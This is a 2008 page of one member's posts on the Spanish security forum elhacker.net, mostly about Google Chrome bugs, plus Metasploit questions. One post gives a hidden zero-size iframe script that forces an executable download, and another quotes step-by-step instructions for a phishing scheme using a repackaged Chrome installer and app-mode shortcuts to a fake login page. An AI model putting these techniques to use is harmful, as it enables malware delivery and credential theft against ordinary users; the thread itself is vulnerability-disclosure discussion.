elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: 1 ... 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [24] 25 26 27 28 29 30
231  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 5 Septiembre 2008, 19:28 pm
Este ultimo PoC "Save As" no me funciona, y ninguna calculadora o calc.exe se ejecuto, al solo me ocasiona el DoS y/o simplemente me cierra la app, esta raro el PoC



-berz3k.

232  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 5 Septiembre 2008, 03:00 am

@WHK

En efecto, al pegar directamente en Chrome no pasa nada, pero el code funciona perfectamente, muy curioso..

-berz3k.

233  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 3 Septiembre 2008, 20:28 pm
PD: Cambie el nombre del topic inicial, para mejorar el tema.

-berz3k.

234  Seguridad Informática / Bugs y Exploits / Re: Bug en google chrome en: 3 Septiembre 2008, 20:22 pm
Browser Automatic File Download

Exploit:

Código:
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>


Alguien mas? exploits diferentes a los posteados? hagamos una lista XD

fuente: securiteam.com

-berz3k.


235  Seguridad Informática / Bugs y Exploits / Re: Bug en google chrome en: 3 Septiembre 2008, 16:39 pm
Otro PoC en shortcuts de Win32

Have you installed the new Google chrome? Make sure you’re careful with your application shortcuts because I just thought of a very easy way to Phish basic users.

Código:

   1. Wrap the Chrome browser installation in your own InstallShield.
   2. Create a Phising Mirror of Gmail or what ever site you want to Phish.
   3. Add Desktop Shortcuts to the InstallShield which link to.
      "C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\chrome.exe"  --app=http://login.live..yourfakehotmailwebsite.com
   4. Build your InstallShield.
   5. Stick a graphic on your website that says “Get Google Chrome Now” and link to your InstallShield build.


When the user install Google chrome from your link they'll get the browser but they will also find some helpful desktop links to their Hotmail/Gmail/Ebay account.

As the Apps mode in Chrome loads in full screen with NO URL BAR (What were they thinking?). The user will happily click on the desktop links thinking it's just a handy shortcut that their friends at Google installed, not knowing it's really a link to our phishing mirror of Gmail.

fuente
:http://www.thewayithink.co.uk/post/Security-Vulnerability-with-Google-Chrome.aspx

236  Seguridad Informática / Bugs y Exploits / Re: Bug en google chrome en: 3 Septiembre 2008, 16:34 pm
:http://evilfingers.com/advisory/google_chrome_poc.php

-berz3k.
237  Programación / Scripting / Re: mensajero por red con wbat en: 29 Agosto 2008, 15:22 pm
La page que posteas existen algunas tools interesantes para dejar de forma desatendida mediante barch algunos programs, muy buen link.

-berz3k.
238  Seguridad Informática / Bugs y Exploits / Re: SE pueden agregar mas exploits al metasploit 3.1 en: 29 Agosto 2008, 15:03 pm
@Zipp0 es una pregunta muy basica, para utilizar Metasploit Framework, antes lograste encontrar alguna vulnerabilidad, aunque no necesariamente, el GUI de Metasploit ya trae muchas tools incluidas para realizar alguna tipo de scanneo "ports scan" "backshell" "shellcodes", etc, data una vuelta por la pagina de Metasploit y leete un poco el manual.

-berz3k.

239  Seguridad Informática / Bugs y Exploits / Re: SE pueden agregar mas exploits al metasploit 3.1 en: 28 Agosto 2008, 11:51 am
Se pueden agregar mas exploits, cuando te bajas la ultima version de Metasploit Framework y realizas un "Online Update" tendras lo ultimo en exploits, obviamente algunos codes no los agregan como "oficiales" de Metasploit, para ello tendras que agregarlos manualmente y/o programarlos.

-berz3k.



240  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Lista de Correo de elhacker.net (Boletín mensual) en: 20 Agosto 2008, 12:07 pm
Agregas tu mail y donde dice "Darme de alta - Suscribirse" le das "click" y listo

-berz3k.
Páginas: 1 ... 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [24] 25 26 27 28 29 30
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines